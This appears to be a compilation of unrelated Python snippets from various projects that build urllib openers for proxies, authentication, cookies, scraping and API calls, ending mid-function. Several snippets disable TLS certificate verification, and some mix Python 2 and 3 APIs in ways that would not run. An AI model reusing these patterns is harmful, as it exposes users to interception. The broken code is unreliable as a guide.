def _get_json5_from_google(self, text):
    escaped_source = quote(text, '')
    headers = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'}
    if self.proxyok == 'yes':
        if self.proxytp == 'socks5':
            opener = build_opener(SocksiPyHandler(PROXY_TYPE_SOCKS5, self.proxyho, int(self.proxypo)))
        elif self.proxytp == 'socks4':
            opener = build_opener(SocksiPyHandler(PROXY_TYPE_SOCKS4, self.proxyho, int(self.proxypo)))
        else:
            opener = build_opener(SocksiPyHandler(PROXY_TYPE_HTTP, self.proxyho, int(self.proxypo)))
        req = Request(self.api_urls['translate'] + "?key=%s&source=%s&target=%s&q=%s"
                      % (self.apikey, self.source, self.target, escaped_source),
                      headers=headers)
        result = opener.open(req, timeout=2).read()
        json = result
    else:
        try:
            req = Request(self.api_urls['translate'] + "?key=%s&source=%s&target=%s&q=%s"
                          % (self.apikey, self.source, self.target, escaped_source),
                          headers=headers)
            result = urlopen(req, timeout=2).read()
            json = result
        except IOError:
            raise GoogleTranslateException(self.error_codes[501])
        except ValueError:
            raise GoogleTranslateException(result)
    return json
def urlopen(url, headers=None, data=None, timeout=None):
    """
    An URL opener with the User-agent set to gPodder (with version)
    """
    username, password = username_password_from_url(url)
    if username is not None or password is not None:
        url = url_strip_authentication(url)
        password_mgr = HTTPPasswordMgrWithDefaultRealm()
        password_mgr.add_password(None, url, username, password)
        handler = HTTPBasicAuthHandler(password_mgr)
        opener = build_opener(handler)
    else:
        opener = build_opener()

    if headers is None:
        headers = {}
    else:
        headers = dict(headers)
    headers.update({'User-agent': USER_AGENT})

    request = Request(url, data=data, headers=headers)
    if timeout is None:
        return opener.open(request)
    else:
        return opener.open(request, timeout=timeout)
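# The gPodder helpers used above (username_password_from_url,
# url_strip_authentication) aren't shown; a rough stand-in can be built with
# urllib.parse. This is a sketch, not the gPodder implementation.
from urllib.parse import urlsplit, urlunsplit

def split_url_credentials(url):
    # Pull inline credentials out of a URL and return the stripped URL
    # together with the username and password (None if absent).
    parts = urlsplit(url)
    host = parts.hostname or ''
    if parts.port:
        host = '%s:%d' % (host, parts.port)
    stripped = urlunsplit((parts.scheme, host, parts.path, parts.query, parts.fragment))
    return stripped, parts.username, parts.password

# split_url_credentials('http://user:secret@example.com/feed')
# -> ('http://example.com/feed', 'user', 'secret')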
def opener_for_url_prefix(url_prefix, username=None, password=None, cache_dict=None):
    if cache_dict is not None:
        cache_key = (url_prefix, username, password)
        try:
            return cache_dict[cache_key]
        except KeyError:
            pass
    if username or password:
        auth_handler = HTTPBasicAuthHandler()
        auth_handler.add_password(
            realm="Open Amiga Game Database",
            uri="{0}".format(url_prefix),
            user=username,
            passwd=password,
        )
        auth_handler.add_password(
            realm="OpenRetro",
            uri="{0}".format(url_prefix),
            user=username,
            passwd=password,
        )
        opener = build_opener(auth_handler)
    else:
        opener = build_opener()
    if cache_dict is not None:
        cache_key = (url_prefix, username, password)
        cache_dict[cache_key] = opener
    return opener
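# A minimal usage sketch for the caching behaviour above: repeated calls with
# the same (prefix, credentials) tuple return the same opener object. The URL
# and credentials are placeholders, not values from the original snippet.
# cache = {}
# opener_a = opener_for_url_prefix('http://oagd.net', 'user', 'secret', cache_dict=cache)
# opener_b = opener_for_url_prefix('http://oagd.net', 'user', 'secret', cache_dict=cache)
# assert opener_a is opener_b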
def get_page(self):
    """
    Strip A Given Page For Links, Returning Them In A List - Takes 1 Argument
    page_number - Page Number To Parse
    """
    if self.config['proxy'] is not None:
        proxy = ProxyHandler({'http': self.config['proxy']})
        opener = build_opener(proxy)
    else:
        opener = build_opener()
    # Dirty User-Agent override
    opener.addheaders[0] = ('User-Agent', choice(self.config['Agents']))
    try:
        rep = opener.open(self.config['url'].format(self.config['query'], self.config['page']))
    except URLError:
        self.die('\t[-] Unable To Retrieve URL')
    html = rep.read()
    links = self.strip_links(Soup(html))
    return links
def run(self):
    self.preprocess()
    if self.config["isProxy"]:
        proxy_handler = urllib.request.ProxyHandler({'http': 'http://proxy.statestreet.com:80'})
        #proxy_auth_handler = urllib.request.ProxyBasicAuthHandler()
        #proxy_auth_handler.add_password('realm', '123.123.2123.123', 'user', 'password')
        # The opener must be installed, otherwise urlopen() below ignores the proxy.
        opener = urllib2.build_opener(urllib.request.HTTPHandler, proxy_handler)
        urllib2.install_opener(opener)
    self.request = urllib2.Request(self.requestUrl, self.data, self.headers)
    try:
        self.response = urllib2.urlopen(self.request)
        self.responseBody = self.response.read()
        self.responseHeaders = self.response.headers
        #if self.responseHeaders["Content-Type"] == "csv":
        if True:  # csv file
            #fileName = self.responseHeaders["Content-disposition"];
            #fileName = fileName.split("\"").reverse()[1];
            #print("fileName ", fileName)
            f = open("a.file", "wb")
            f.write(self.responseBody)
            f.close()
    except urllib.error.HTTPError as e:
        print(e)
        self.responseStatus = e.code
def _get_json5_from_google(self, text):
    escaped_source = quote(text, '')
    headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0'}
    if self.proxyok == 'yes':
        if self.proxytp == 'socks5':
            opener = build_opener(SocksiPyHandler(PROXY_TYPE_SOCKS5, self.proxyho, int(self.proxypo)))
        elif self.proxytp == 'socks4':
            opener = build_opener(SocksiPyHandler(PROXY_TYPE_SOCKS4, self.proxyho, int(self.proxypo)))
        else:
            opener = build_opener(SocksiPyHandler(PROXY_TYPE_HTTP, self.proxyho, int(self.proxypo)))
        req = Request(self.api_urls['translate'] + "&sl=%s&tl=%s&text=%s"
                      % (self.source, self.target, escaped_source),
                      headers=headers)
        result = opener.open(req, timeout=2).read()
        json = result
    else:
        try:
            req = Request(self.api_urls['translate'] + "&sl=%s&tl=%s&text=%s"
                          % (self.source, self.target, escaped_source),
                          headers=headers)
            result = urlopen(req, timeout=2).read()
            json = result
        except IOError:
            raise GoogleTranslateException(self.error_codes[501])
        except ValueError:
            raise GoogleTranslateException(result)
    return json
def run(self):
    self.preprocess()
    if self.config["isProxy"]:
        proxy_handler = urllib.request.ProxyHandler({'http': 'http://proxy.statestreet.com:80'})
        #proxy_auth_handler = urllib.request.ProxyBasicAuthHandler()
        #proxy_auth_handler.add_password('realm', '123.123.2123.123', 'user', 'password')
        # The opener must be installed, otherwise urlopen() below ignores the proxy.
        opener = urllib2.build_opener(urllib.request.HTTPHandler, proxy_handler)
        urllib2.install_opener(opener)
    #self.newData = urllib.parse.urlencode(self.data)
    self.newData = self.data
    self.headers["Content-Type"] = self.type
    print("new data", self.newData.encode())
    print("req", self.headers)
    self.request = urllib2.Request(url=self.requestUrl, data=self.newData.encode(),
                                   headers=self.headers, method="POST")
    try:
        self.response = urllib2.urlopen(self.request)
        self.responseBody = self.response.read()
        self.responseHeaders = self.response.headers
        # save files of xls and csv
        contentType = self.responseHeaders["Content-Type"]
        #if self.responseHeaders["Content-Type"] == "csv":
        if True:
            f = open("./a.file", "wb")
            f.write(self.responseBody)
            f.close()
    except urllib.error.HTTPError as e:
        print(e)
        self.responseStatus = e.code
def resetProxies(self, httpProxyTuple):
    # for ntlm, user and password are required
    self.hasNTLM = False
    if isinstance(httpProxyTuple, (tuple, list)) and len(httpProxyTuple) == 5:
        useOsProxy, _urlAddr, _urlPort, user, password = httpProxyTuple
        _proxyDirFmt = proxyDirFmt(httpProxyTuple)
        # only try ntlm if user and password are provided because passman is needed
        if user and not useOsProxy:
            for pluginXbrlMethod in pluginClassMethods("Proxy.HTTPNtlmAuthHandler"):
                HTTPNtlmAuthHandler = pluginXbrlMethod()
                if HTTPNtlmAuthHandler is not None:
                    self.hasNTLM = True
            if not self.hasNTLM:  # try for python site-packages ntlm
                try:
                    from ntlm import HTTPNtlmAuthHandler
                    self.hasNTLM = True
                except ImportError:
                    pass
        if self.hasNTLM:
            pwrdmgr = proxyhandlers.HTTPPasswordMgrWithDefaultRealm()
            pwrdmgr.add_password(None, _proxyDirFmt["http"], user, password)
            self.proxy_handler = proxyhandlers.ProxyHandler({})
            self.proxy_auth_handler = proxyhandlers.ProxyBasicAuthHandler(pwrdmgr)
            self.http_auth_handler = proxyhandlers.HTTPBasicAuthHandler(pwrdmgr)
            self.ntlm_auth_handler = HTTPNtlmAuthHandler.HTTPNtlmAuthHandler(pwrdmgr)
            self.opener = proxyhandlers.build_opener(self.proxy_handler,
                                                     self.ntlm_auth_handler,
                                                     self.proxy_auth_handler,
                                                     self.http_auth_handler)
    if not self.hasNTLM:
        self.proxy_handler = proxyhandlers.ProxyHandler(proxyDirFmt(httpProxyTuple))
        self.proxy_auth_handler = proxyhandlers.ProxyBasicAuthHandler()
        self.http_auth_handler = proxyhandlers.HTTPBasicAuthHandler()
        self.opener = proxyhandlers.build_opener(self.proxy_handler,
                                                 self.proxy_auth_handler,
                                                 self.http_auth_handler)
def POST(url, args={}, cred=None):
    """do http post

    url is the URL you want
    args is a dict of cgi args
    cred is ( host, realm, username, password )
    """
    auth_handler = None
    if cred is not None:
        (host, realm, username, password) = cred
        auth_handler = HTTPBasicAuthHandler()
        auth_handler.add_password(realm, host, username, password)
    if auth_handler:
        opener = build_opener(cookie_processor, auth_handler)
    else:
        opener = build_opener(cookie_processor)
    install_opener(opener)
    print("URL %s" % url)
    # request data must be bytes on Python 3
    data = urlencode(args).encode('utf-8')
    req = Request(url, data)
    f = urlopen(req)
    return f
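# A usage sketch, assuming the module-level cookie_processor (e.g. an
# HTTPCookieProcessor) that POST() wires into the opener; the URL, realm and
# credentials here are placeholders.
# f = POST('http://example.com/login',
#          args={'user': 'alice', 'pass': 'secret'},
#          cred=('http://example.com', 'Members', 'alice', 'secret'))
# print(f.read())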
def _http_get(uri, silent=False):
    if PYTHON3:
        opener = urllib2.build_opener(urllib2.ProxyHandler(urllib.request.getproxies()))
    else:
        opener = urllib2.build_opener(urllib2.ProxyHandler(urllib.getproxies()))
    for repo in repos:
        if 'storage.jcloud.com' in repo:
            _uri = uri
            # NOTE: str.lstrip strips a *set of characters*, not a prefix string
            for p in ('/', 'dev', 'master', 'update', 'plugins'):
                _uri = _uri.lstrip(p).lstrip('/')
            url = repo + '/' + _uri
        else:
            url = repo + '/raw/' + uri
        try:
            resp = opener.open(urllib2.Request(url, headers=headers), timeout=15)
            body = resp.read()
            try:
                f = StringIO(body)
                gz = gzip.GzipFile(fileobj=f)
                body = gz.read()
            except:
                pass
        except urllib2.HTTPError as e:
            if not silent:
                print('HTTP Error %s when fetching %s' % (e.code, url))
        except urllib2.URLError as e:
            pass
        else:
            return body
def __open(self, url, headers={}, data=None, baseurl=""):
    """Raw urlopen command"""
    if not baseurl:
        baseurl = self.baseurl
    req = Request("%s%s" % (baseurl, url), headers=headers)
    try:
        req.data = urlencode(data).encode('utf-8')  # Python 3
    except:
        try:
            req.add_data(urlencode(data))  # Python 2
        except:
            pass
    # Proxy support
    if self.proxy_url is not None:
        if self.proxy_user is None:
            handler = ProxyHandler({'https': self.proxy_url})
            opener = build_opener(handler)
        else:
            proxy = ProxyHandler({'https': 'https://%s:%s@%s' % (self.proxy_user,
                                                                 self.proxy_password,
                                                                 self.proxy_url)})
            auth = HTTPBasicAuthHandler()
            opener = build_opener(proxy, auth, HTTPHandler)
        resp = opener.open(req)
    else:
        resp = urlopen(req)
    charset = resp.info().get('charset', 'utf-8')
    return json.loads(resp.read().decode(charset))
def urlrequest(stream, url, headers, write_lock, debug=0):
    """URL request function"""
    if debug:
        print("Input for urlrequest", url, headers, debug)
    req = UrlRequest('GET', url=url, headers=headers)
    if debug:
        hdlr = urllib2.HTTPHandler(debuglevel=1)
        opener = urllib2.build_opener(hdlr)
    else:
        opener = urllib2.build_opener()
    time0 = time.time()
    fdesc = opener.open(req)
    data = fdesc.read()
    ctime = time.time() - time0
    fdesc.close()
    # just use elapsed time if we use html format
    if headers['Accept'] == 'text/html':
        response = {'ctime': str(ctime)}
    else:
        decoder = JSONDecoder()
        response = decoder.decode(data)
    if isinstance(response, dict):
        write_lock.acquire()
        stream.write(str(response) + '\n')
        stream.flush()
        write_lock.release()
def getFile(cls, getfile, unpack=True):
    if cls.getProxy():
        proxy = req.ProxyHandler({'http': cls.getProxy(), 'https': cls.getProxy()})
        auth = req.HTTPBasicAuthHandler()
        opener = req.build_opener(proxy, auth, req.HTTPHandler)
        req.install_opener(opener)
    if cls.ignoreCerts():
        ctx = ssl.create_default_context()
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE
        opener = req.build_opener(urllib.request.HTTPSHandler(context=ctx))
        req.install_opener(opener)

    response = req.urlopen(getfile)
    data = response

    # TODO: if data == text/plain; charset=utf-8, read and decode
    if unpack:
        if 'gzip' in response.info().get('Content-Type'):
            buf = BytesIO(response.read())
            data = gzip.GzipFile(fileobj=buf)
        elif 'bzip2' in response.info().get('Content-Type'):
            data = BytesIO(bz2.decompress(response.read()))
        elif 'zip' in response.info().get('Content-Type'):
            fzip = zipfile.ZipFile(BytesIO(response.read()), 'r')
            if len(fzip.namelist()) > 0:
                data = BytesIO(fzip.read(fzip.namelist()[0]))
    return (data, response)
def write_cookie_file(className, username, password):
    """
    Automatically generate a cookie file for the Coursera site.
    """
    try:
        global csrftoken
        global session

        hn, fn = tempfile.mkstemp()
        cookies = cjlib.LWPCookieJar()
        handlers = [
            urllib2.HTTPHandler(),
            urllib2.HTTPSHandler(),
            urllib2.HTTPCookieProcessor(cookies)
        ]
        opener = urllib2.build_opener(*handlers)

        req = urllib2.Request(get_syllabus_url(className))
        res = opener.open(req)

        for cookie in cookies:
            if cookie.name == 'csrf_token':
                csrftoken = cookie.value
                break
        opener.close()

        # Now make a call to the authenticator url:
        cj = cjlib.MozillaCookieJar(fn)
        opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj),
                                      urllib2.HTTPHandler(),
                                      urllib2.HTTPSHandler())

        # Preparation of headers and of data that we will send in a POST
        # request.
        std_headers = {
            'Cookie': ('csrftoken=%s' % csrftoken),
            'Referer': 'https://www.coursera.org',
            'X-CSRFToken': csrftoken,
        }
        auth_data = {
            'email_address': username,
            'password': password
        }
        formatted_data = urlparse.urlencode(auth_data).encode('ascii')

        req = urllib2.Request(AUTH_URL, formatted_data, std_headers)
        opener.open(req)
    except HTTPError as e:
        if e.code == 404:
            raise LookupError(className)
        else:
            raise

    cj.save()
    opener.close()
    os.close(hn)
    return fn
def main():
    pagestart = int(sys.argv[1])
    pageend = int(sys.argv[2])
    dirout = sys.argv[3]
    url = r'http://jobsearch.naukri.com/jobs-in-india-'
    url2 = '?ql=india&qs=f'
    outputfile = dirout + "\\tables_" + str(pagestart) + "_" + str(pageend) + ".json"
    file = open(outputfile, 'w+')
    mylist = list()
    j = 0
    for i in range(pagestart, pageend):
        temp = url + str(i) + url2
        opener = build_opener()
        opener.addheaders = [('User-agent', 'Try/' + str(i) + ".0")]
        response = opener.open(temp)
        soup = BeautifulSoup(response)
        for content in soup.find("form").findAll('a', attrs={"target": "_blank"}):
            listingurl = content.get('href')
            openerurl = build_opener()
            responseurl = openerurl.open(listingurl)
            soupurl = None
            try:
                soupurl = BeautifulSoup(responseurl)
                DataMatrix = setjdRows(soupurl.findAll('div', attrs={"class": "jdRow"}))
                DataMatrix['jobTitle'] = soupurl.find('h1', attrs={"class": "jobTitle"}).getText()
                DataMatrix['date'] = str(soupurl.find('span', attrs={"class": "fr"})).split('span')[3][1:][:-2].split()
                DataMatrix['url'] = listingurl
                DataMatrix['company'] = str(soupurl.find('div', attrs={"class": "jobDet"})).split('span')[2][:-2][2:]
                if len(str(soupurl.find('div', attrs={"class": "jobDet"})).split('span')) >= 7:
                    DataMatrix['alias'] = str(soupurl.find('div', attrs={"class": "jobDet"})).split('span')[4][:-2][2:]
                    DataMatrix['location'] = str(soupurl.find('div', attrs={"class": "jobDet"})).split('span')[6][:-6][2:].split()
                elif len(str(soupurl.find('div', attrs={"class": "jobDet"})).split('span')) >= 4:
                    DataMatrix['location'] = str(soupurl.find('div', attrs={"class": "jobDet"})).split('span')[4][:-6][2:].split()
                # 'and', not bitwise '&': '&' binds tighter than comparisons
                if len(str(soupurl.find('span', attrs={"class": "fl"})).split('span')) >= 4 and \
                        len(str(soupurl.find('span', attrs={"class": "fl"})).split('span')[3].split('to')) >= 2:
                    DataMatrix['experienceMin'] = str(soupurl.find('span', attrs={"class": "fl"})).split('span')[3].split('to')[0][2:]
                    DataMatrix['experienceMax'] = str(soupurl.find('span', attrs={"class": "fl"})).split('span')[3].split('to')[1][:-10]
                elif len(str(soupurl.find('span', attrs={"class": "fl"})).split('span')) >= 11:
                    DataMatrix['openings'] = str(soupurl.find('span', attrs={"class": "fl"})).split('span')[11][:-2][1:]
                    DataMatrix['salaryMin'] = str(soupurl.find('span', attrs={"class": "fl"})).split('span')[7][:-2][1:].strip().split('-')[0].split(' ')[1]
                    DataMatrix['salaryMax'] = str(soupurl.find('span', attrs={"class": "fl"})).split('span')[7][:-2][1:].strip().split('-')[1].split(' ')[1]
                    DataMatrix['currency'] = str(soupurl.find('span', attrs={"class": "fl"})).split('span')[7][:-2][1:].strip().split('-')[0].split(' ')[0]
                    DataMatrix['salaryRate'] = str(soupurl.find('span', attrs={"class": "fl"})).split('span')[7][:-2][1:].strip().split('-')[1].split(' ')[2]
                elif len(str(soupurl.find('span', attrs={"class": "fl"})).split('span')) >= 7:
                    if 'Opening' in str(soupurl.find('span', attrs={"class": "fl"})):
                        DataMatrix['opening'] = str(soupurl.find('span', attrs={"class": "fl"})).split('span')[7][:-2][1:]
                    else:
                        DataMatrix['salaryMin'] = str(soupurl.find('span', attrs={"class": "fl"})).split('span')[7][:-2][1:].strip().split('-')[0].split(' ')[1]
                        DataMatrix['salaryMax'] = str(soupurl.find('span', attrs={"class": "fl"})).split('span')[7][:-2][1:].strip().split('-')[1].split(' ')[1]
                        DataMatrix['currency'] = str(soupurl.find('span', attrs={"class": "fl"})).split('span')[7][:-2][1:].strip().split('-')[0].split(' ')[0]
                        DataMatrix['salaryRate'] = str(soupurl.find('span', attrs={"class": "fl"})).split('span')[7][:-2][1:].strip().split('-')[1].split(' ')[2]
                t = postprocess(DataMatrix)
                mylist.append(t)
            except Exception as e:
                j = j + 1
                print(j)
    json.dump(mylist, file)
    file.close()
def get_cookie(domain):
    ssl._create_default_https_context = ssl._create_unverified_context
    cookie_filename = "cookie.txt"
    account_filename = "account.json"
    header_dict = {'Content-Type': 'application/json'}
    session_str = domain + "rest/auth/1/session"
    req = request.Request(url=session_str, headers=header_dict)
    cookie = load_cookie_from_file(cookie_filename)
    if cookie is None:
        cookie = update_cookie_to_file(cookie_filename, account_filename, session_str, header_dict)
        if cookie is None:
            print('Login error:%s' % "cookie==None")
            return False, None
    opener = request.build_opener(request.HTTPCookieProcessor(cookie))
    cookie_expired_error = False
    try:
        r = opener.open(req)
    except URLError as e:
        if hasattr(e, 'code'):
            print('Error code: ', e.code)
            if e.code == 401:
                cookie_expired_error = True
        if hasattr(e, 'reason'):
            print('Reason: ', e.reason)
        if cookie_expired_error == False:
            print('Login error:%s' % "URLError")
            return False, None
    if cookie_expired_error == True:
        cookie_expired_error = False
        cookie = update_cookie_to_file(cookie_filename, account_filename, session_str, header_dict)
        if cookie is None:
            print('Login error:%s' % "cookie==None 2")
            return False, None
        opener = request.build_opener(request.HTTPCookieProcessor(cookie))
        req = request.Request(url=session_str, headers=header_dict)
        try:
            r = opener.open(req)
        except URLError as e:
            if hasattr(e, 'code'):
                print('Error code: ', e.code)
            if hasattr(e, 'reason'):
                print('Reason: ', e.reason)
            print('Login error:%s' % "URLError 2")
            return False, None
    res_str = r.read().decode('utf-8')
    res = json.loads(res_str)
    if 'errorMessages' in res:
        print('Login error:%s' % res.get('errorMessages'))
        return False, None
    else:
        ## print('Login succeed!\nres=\n%s' % res)
        print('Login succeed!')
        return True, cookie
def __init__(self, proxy=None):
    cj = LWPCookieJar()
    cookie_handler = urlrequest.HTTPCookieProcessor(cj)
    if proxy:
        proxy_handler = urlrequest.ProxyHandler({'http': proxy})
        opener = urlrequest.build_opener(proxy_handler, cookie_handler)
    else:
        opener = urlrequest.build_opener(cookie_handler)
    urlrequest.install_opener(opener)
def _http_request(url, method=None, data=None, opt=None):
    # Check protocol.
    proto = url.split(':', 1)[0]
    if proto not in opt.protocols:
        raise BadProtocol('Protocol %s in URL %r disallowed by caller' % (proto, url))

    # Create URL opener.
    if opt.verify_cert:
        # It's legal to pass either a class or an instance here.
        opener = request.build_opener(ValidHTTPSHandler(opt.cacert_file))
    else:
        opener = request.build_opener()

    # Create the Request with optional extra headers.
    req = Request(url=url, data=data, method=method, headers=(opt.headers or {}))

    exc_info, fp, stored_exception = None, None, None
    try:
        fp = opener.open(req)
        # print fp.info()  # (temp, print headers)
        response = fp.read()
    except request.HTTPError as exception:
        fp = exception.fp  # see finally clause
        exc_info = sys.exc_info()
        stored_exception = exception
    except Exception as exception:
        exc_info = sys.exc_info()
        stored_exception = exception
    finally:
        if fp:
            # Try a bit harder to flush the connection and close it
            # properly. In case of errors, our django testserver peer
            # will show an error about us killing the connection
            # prematurely instead of showing the URL that causes the
            # error. Flushing the data here helps.
            if exc_info:
                response = fp.read()
                fp.close()
                # And, even more importantly. Some people want the
                # exception/error info. Store it in our HTTPError
                # subclass.
                raise HTTPError(
                    exc_info[1].url,
                    exc_info[1].code,
                    exc_info[1].msg,
                    exc_info[1].hdrs,
                    response
                )
            fp.close()
        if exc_info:
            raise stored_exception  # exc_info[0], exc_info[1], exc_info[2]
    return response
def __init__(self, username=None, password=None):
    self._username = username
    self._password = password
    self._cookie_jar = CookieJar()
    cookie_handler = request.HTTPCookieProcessor(self._cookie_jar)
    if username is not None and password is not None:
        password_manager = SimpleHttpPasswordManager(username, password)
        auth_handler = request.HTTPBasicAuthHandler(password_manager)
        self._opener = request.build_opener(auth_handler, cookie_handler)
    else:
        self._opener = request.build_opener(cookie_handler)
def getUrllibOpener():
    if pythonVersion > 3.0:
        ctx = ssl.create_default_context()
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE
        opener = urllib2.build_opener(urllib2.HTTPSHandler(context=ctx))
    else:
        opener = urllib2.build_opener(urllib2.HTTPSHandler())
    opener.addheaders = [('Content-Type', 'application/json'),
                         ('User-Agent', 'vulners-getsploit-v%s' % __version__)]
    return opener
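# A usage sketch; on Python 3 the opener above disables certificate
# verification, so endpoints with self-signed certificates are accepted.
# The URL is a placeholder, not part of the original snippet.
# opener = getUrllibOpener()
# print(opener.open('https://self-signed.example.com/').read())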
def check_if_already_downloaded(url, datapackage_name=None,
                                download_dir=FLOTILLA_DOWNLOAD_DIR):
    """Download a url filename, unless it has already been downloaded.

    Save into directory named 'datapackage_name' if provided, otherwise save
    in directory named after value for key 'name' in json file

    Parameters
    ----------
    url : str
        HTTP url of a file you want to download

    Returns
    -------
    filename : str
        Location of the file on your system
    """
    try:
        os.mkdir(download_dir)
        sys.stdout.write('Creating a directory for saving your flotilla '
                         'projects: {}\n'.format(download_dir))
    except OSError:
        pass

    if datapackage_name is None:
        req = Request(url)
        opener = build_opener()
        opened_url = opener.open(req)
        datapackage = json.loads(opened_url.read())
        datapackage_name = datapackage['name']

    package_dir = '{}/{}'.format(download_dir, datapackage_name)
    try:
        os.mkdir(package_dir)
        sys.stdout.write('Creating a directory for saving the data for this '
                         'project: {}\n'.format(package_dir))
    except OSError:
        pass

    basename = url.rsplit('/', 1)[-1]
    filename = os.path.expanduser(os.path.join(package_dir, basename))
    if not os.path.isfile(filename):
        sys.stdout.write('{} has not been downloaded before.\n\tDownloading '
                         'now to {}\n'.format(url, filename))
        req = Request(url)
        opener = build_opener()
        opened_url = opener.open(req)
        # write bytes: the opener returns bytes on Python 3
        with open(filename, 'wb') as f:
            f.write(opened_url.read())
    return filename
def _connect(self):
    """
    Internal function connecting to the server.
    """
    username = self._username
    password = self._password
    if username and password:
        passman = urllib2.HTTPPasswordMgrWithDefaultRealm()
        passman.add_password(None, self._url, username, password)
        self.authhandler = urllib2.HTTPBasicAuthHandler(passman)
        self.passman = passman
        self.opener = urllib2.build_opener(self.authhandler)
    else:
        self.opener = urllib2.build_opener()
def resetProxies(self, httpProxyTuple):
    try:
        from ntlm import HTTPNtlmAuthHandler
        self.hasNTLM = True
    except ImportError:
        self.hasNTLM = False
    self.proxy_handler = proxyhandlers.ProxyHandler(proxyDirFmt(httpProxyTuple))
    self.proxy_auth_handler = proxyhandlers.ProxyBasicAuthHandler()
    self.http_auth_handler = proxyhandlers.HTTPBasicAuthHandler()
    if self.hasNTLM:
        self.ntlm_auth_handler = HTTPNtlmAuthHandler.HTTPNtlmAuthHandler()
        self.opener = proxyhandlers.build_opener(self.proxy_handler,
                                                 self.ntlm_auth_handler,
                                                 self.proxy_auth_handler,
                                                 self.http_auth_handler)
    else:
        self.opener = proxyhandlers.build_opener(self.proxy_handler,
                                                 self.proxy_auth_handler,
                                                 self.http_auth_handler)
def call_API(self, API_endpoint_URL, params_dict,
             timeout=socket._GLOBAL_DEFAULT_TIMEOUT):
    """
    Invokes a specific OWM web API endpoint URL, returning raw JSON data.

    :param API_endpoint_URL: the API endpoint to be invoked
    :type API_endpoint_URL: str
    :param params_dict: a dictionary containing the query parameters to be
        used in the HTTP request (given as key-value couples in the dict)
    :type params_dict: dict
    :param timeout: how many seconds to wait for connection establishment
        (defaults to ``socket._GLOBAL_DEFAULT_TIMEOUT``)
    :type timeout: int
    :returns: a string containing raw JSON data
    :raises: *APICallError*

    """
    url = self._build_full_URL(API_endpoint_URL, params_dict)
    cached = self._cache.get(url)
    if cached:
        return cached
    else:
        try:
            if self._identity and self._identity.token:
                bearer_token_header = "Bearer %s:%s" % (
                    self._identity.device_id, self._identity.token)
            else:
                bearer_token_header = None
            try:
                from urllib.request import urlopen, build_opener
                opener = build_opener()
                if bearer_token_header:
                    opener.addheaders = [('Authorization', bearer_token_header)]
            except ImportError:
                from urllib2 import urlopen, build_opener
                opener = build_opener()
                if bearer_token_header:
                    opener.addheaders = [('Authorization', bearer_token_header)]
            response = opener.open(url, None, timeout)
        except HTTPError as e:
            raise api_call_error.APICallError(str(e.reason), e)
        except URLError as e:
            raise api_call_error.APICallError(str(e.reason), e)
        else:
            data = response.read().decode('utf-8')
            self._cache.set(url, data)
            return data
def _request(self, request_fun, url, api, headers, params=None, data=None):
    url = self._get_url(url, api)
    if params:
        url += '?%s' % urlencode(params)
    request_headers = self._get_headers(headers)
    if data:
        data = str2bytes(data)
    request = Request(url=url, data=data, headers=request_headers)
    request.get_method = request_fun
    if self._cert:
        cert_handler = self._https_handler()
        opener = build_opener(cert_handler)
    else:
        opener = build_opener()
    return bytes2str(opener.open(request).read())
def __add_openers(self):
    # TODO add error handling
    self.opener = urllib2.build_opener()

    # Proxy handling
    # TODO currently self.proxies isn't parsed from configuration file
    # if len(self.proxies) > 0:
    #     for proxy in self.proxies:
    #         url = proxy['url']
    #         # TODO test this:
    #         if "user" in proxy and "pass" in proxy:
    #             if url.lower().startswith('https://'):
    #                 url = 'https://' + proxy['user'] + ':' + proxy['pass'] + '@' + url[8:]
    #             else:
    #                 url = 'http://' + proxy['user'] + ':' + proxy['pass'] + '@' + url[7:]
    #         # FIXME move proxy auth to sth like this:
    #         # passman = urllib2.HTTPPasswordMgrWithDefaultRealm()
    #         # passman.add_password(None, url, proxy['user'], proxy['password'])
    #         # opener.add_handler(urllib2.HTTPBasicAuthHandler(passman))
    #
    #         if url.lower().startswith('https://'):
    #             opener.add_handler(urllib2.ProxyHandler({'https': url}))
    #         else:
    #             opener.add_handler(urllib2.ProxyHandler({'https': url}))

    # HTTP Basic Auth
    if self.user is not None and self.password is not None:
        passman = urllib2.HTTPPasswordMgrWithDefaultRealm()
        passman.add_password(None, self.url, self.user, self.password)
        self.opener.add_handler(urllib2.HTTPBasicAuthHandler(passman))
        self.debug("Enabling HTTP basic auth")
def setup_proxy(self):
    """
    Setup http proxy
    """
    proxy = ProxyHandler({'https': self.proxy})
    opener = build_opener(proxy)
    install_opener(opener)
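# A minimal sketch of the same pattern at module level; the proxy address is
# a placeholder. Building and installing the opener makes no network traffic;
# only subsequent urlopen() calls are routed through the proxy.
from urllib.request import ProxyHandler, build_opener, install_opener

install_opener(build_opener(ProxyHandler({'https': 'http://127.0.0.1:8080'})))
# urlopen('https://example.com') would now go through the proxy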
def fetch(self, url):
    """
    Fetch url and create a response object according to the mime-type.

    Args:
        url: The url to fetch data from

    Returns:
        OEmbedResponse object according to data fetched
    """
    proxy_support = ProxyHandler({})
    opener = build_opener(proxy_support)
    # addheaders expects a list of tuples (a dict view isn't accepted on Python 3)
    opener.addheaders = list(self._requestHeaders.items())
    response = opener.open(url)
    headers = response.info()
    raw = response.read()
    if 'Content-Type' not in headers:
        raise OEmbedError('Missing mime-type in response')
    if headers['Content-Type'].find('application/xml') != -1 or \
       headers['Content-Type'].find('text/xml') != -1:
        response = OEmbedResponse.new_from_xml(raw)
    elif headers['Content-Type'].find('application/json') != -1 or \
         headers['Content-Type'].find('text/json') != -1:
        response = OEmbedResponse.new_from_json(raw)
    else:
        raise OEmbedError('Invalid mime-type in response - %s' % headers['Content-Type'])
    return response
def fetch(self, server):
    '''
    This function gets your IP from a specific server
    '''
    url = None
    opener = urllib.build_opener()
    opener.addheaders = [('User-agent',
                          "Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20100101 Firefox/24.0")]
    try:
        url = opener.open(server)
        content = url.read()

        # Didn't want to import chardet. Preferred to stick to stdlib
        if PY3K:
            try:
                content = content.decode('UTF-8')
            except UnicodeDecodeError:
                content = content.decode('ISO-8859-1')

        m = re.search(
            r'(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.'
            r'(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.'
